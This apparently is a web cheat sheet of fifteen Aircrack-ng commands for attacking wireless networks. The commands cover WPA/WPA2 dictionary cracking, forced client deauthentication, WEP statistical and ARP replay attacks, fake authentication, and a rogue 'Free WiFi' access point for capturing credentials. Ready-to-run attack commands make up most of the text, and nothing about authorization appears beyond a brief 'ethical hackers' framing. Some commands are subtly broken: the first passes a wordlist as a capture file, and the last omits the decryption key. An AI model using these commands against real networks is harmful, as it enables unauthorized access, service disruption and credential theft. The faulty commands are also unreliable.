Top 15 Aircrack-ng Commands For Cracking Wireless Networks

Aircrack-ng is a powerful suite of tools used for network security assessment and penetration testing of wireless networks. It allows users to monitor, capture, and analyze wireless traffic, as well as perform attacks to test security vulnerabilities.

Here are the top 15 Aircrack-ng commands you should know:

1. Crack WPA/WPA2-PSK Passwords
2. Crack WPA Handshake with Specific SSID
3. Capture Wireless Network Packets
4. Deauthenticate Clients to Capture Handshakes
5. Capture Packets on a Specific Channel and BSSID
6. Use PTW Attack Against WEP
7. Use KoreK Attack Against WEP
8. Capture Packets on All Wireless Bands
9. Perform ARP Replay Attack
10. Perform Injection Test
11. Fake Authentication Attack
12. Interactive Packet Replay Attack
13. Write Captured Packets to a File
14. Create a Fake Access Point
15. Decrypt WEP/WPA Packets with Known Key

1. Crack WPA/WPA2-PSK Passwords

aircrack-ng -a2 -b [BSSID] -w /path/to/wordlist.cap

This command attempts to crack WPA/WPA2-PSK passwords using a dictionary attack.

2. Crack WPA Handshake with Specific SSID

aircrack-ng -e [SSID] -w /path/to/wordlist /path/to/capture.cap

If you have a specific SSID in mind, this command targets that network’s handshake for password cracking.

3. Capture Wireless Network Packets

airodump-ng wlan0

This command scans available wireless networks and captures packets for analysis.

4. Deauthenticate Clients to Capture Handshakes

aireplay-ng -0 10 -a [BSSID] wlan0

This command forces clients to disconnect from an access point, making them reconnect and send a handshake, which can be captured for password cracking.

5. Capture Packets on a Specific Channel and BSSID

airodump-ng -c 6 --bssid [BSSID] -w capture wlan0

This command targets a specific channel and BSSID to capture packets, which is useful for focused attacks.

6. Use PTW Attack Against WEP

aircrack-ng -z /path/to/capture.cap

The PTW attack is a faster method to crack WEP encryption using statistical techniques.

7. Use KoreK Attack Against WEP

aircrack-ng -k 1 /path/to/capture.cap

This command applies KoreK attacks, which are multiple statistical attacks to break WEP keys.

8. Capture Packets on All Wireless Bands

airodump-ng --band abg wlan0

This command enables scanning across all wireless bands (802.11a, b, and g).

9. Perform ARP Replay Attack

aireplay-ng -3 -b [BSSID] wlan0

An ARP replay attack helps generate traffic on WEP networks, making cracking easier.

10. Perform Injection Test

aireplay-ng -9 wlan0

This command checks whether your wireless adapter supports packet injection, which is crucial for certain attacks.

11. Fake Authentication Attack

aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [MAC] wlan0

This attack associates your device with the target AP, helping in further attacks like WEP cracking.

12. Interactive Packet Replay Attack

aireplay-ng -2 -r /path/to/arp-request wlan0

This command allows for interactive packet replay, helping in network penetration testing.

13. Write Captured Packets to a File

airodump-ng --write /path/to/output wlan0

This command saves captured packets for later analysis.

14. Create a Fake Access Point

airbase-ng -e "Free WiFi" -c 6 wlan0

This command creates a rogue access point to capture user credentials.

15. Decrypt WEP/WPA Packets with Known Key

airdecap-ng -e [SSID] /path/to/capture.cap

If you already have the encryption key, this command decrypts captured packets for analysis.

Conclusion

Aircrack-ng is a vital tool for ethical hackers and security professionals to test and secure wireless networks. Mastering these 15 commands will help you efficiently assess vulnerabilities and enhance network security.